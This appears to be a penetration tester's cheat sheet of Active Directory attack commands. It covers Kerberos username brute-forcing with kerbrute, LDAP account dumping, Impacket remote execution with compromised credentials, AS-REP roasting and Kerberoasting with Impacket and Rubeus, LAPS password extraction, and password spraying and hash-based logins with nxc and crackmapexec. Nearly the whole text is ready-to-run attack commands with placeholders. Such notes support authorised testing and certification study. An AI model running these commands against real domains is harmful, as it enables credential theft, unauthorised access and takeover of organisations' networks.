Enumeration

Kerbrute - Bruteforcing AD accounts

kerbrute userenum -d <domain> --dc <ip> users.txt
	# Ensure that users.txt contains a list of potential usernames

LDAP Search

ldapsearch -v -x -b "DC=<>,DC=<>" -H "ldap://<IP>" "(objectclass=*)"
ldapsearch -v -x -b "DC=<>,DC=<>" -H "ldap://<IP>" "(objectclass=*)" | grep sAMAccountName: | awk '{print $2}'
ldapsearch -v -x -b "DC=<>,DC=<>" -H "ldap://<IP>" "(objectclass=*)" | grep sAMAccountName: | awk '{print $2}' > users.txt

Impacket

Remote Access with:
 smb service -
  impacket-psexec <domain>/<compromised username>:<password>@<IP>
  impacket-smbexec <domain>/<compromised username>:<password>@<IP>
  impacket-wmiexec <domain>/<compromised username>:<password>@<IP>

 sql service -
  impacket-mssqlclient <domain>/<compromised username>:<password>@<IP> -windows-auth
AS-REP Roasting
	Kali:  impacket-GetNPUsers -request -dc-ip <Domain Controller IP> -outputfile <output file name> <domain>/<compromised username>
	Windows: .\\Rubeus.exe asreproast /outfile:<output filename> /nowrap
	
Kerberoasting	
	Kali:  impacket-GetUserSPNs -request -dc-ip <Domain Controller IP>  -outputfile <output file name> <domain>/<compromised username>
	Windows:.\\Rubeus.exe kerberoast /outfile:<output filename> /nowrap

LAPS Password
	Kali: impacket-GetLAPSPassword -dc-ip <ip> <domain>/<username>:<password>
		# Discovered password belongs the local administrator of the target machine

nxc

nxc smb <ip>
nxc smb <ip> --pass-pol
nxc smb <ip> -d <domain name> -u <username or username list> -p '<password or password list>' --continue-on-success
	# Ensure that users.txt contains a list of potential usernames
	
nxc winrm <ip>
	# To verify if PSRemoting is enabled
nxc winrm <ip> -d <domain name> -u <username or username list> -H '<hash or hash list>' --continue-on-success
	# To verify if supplied credentials can be used for evil-winrm connection
	
nxc rdp <ip>
nxc rdp <ip> -d <domain name> -u <username or username list> -p '<password or password list>' --continue-on-success

crackmapexec

crackmapexec smb <ip>
crackmapexec smb <ip> --pass-pol
crackmapexec smb <ip> -d <domain name> -u <username or username list> -p '<password or password list>' --continue-on-success
	# Ensure that users.txt contains a list of potential usernames 
	
crackmapexec winrm <ip>
	# To verify if PSRemoting is enabled
crackmapexec winrm <ip> -d <domain name> -u <username or username list> -H '<password or password list>' --continue-on-success
	# To verify if supplied credentials can be used for evil-winrm connection
	
crackmapexec rdp <ip>
crackmapexec rdp <ip> -d <domain name> -u <username or username list> -p '<password or password list>' --continue-on-success

PreviousWindowsNextLateral Movement

Last updated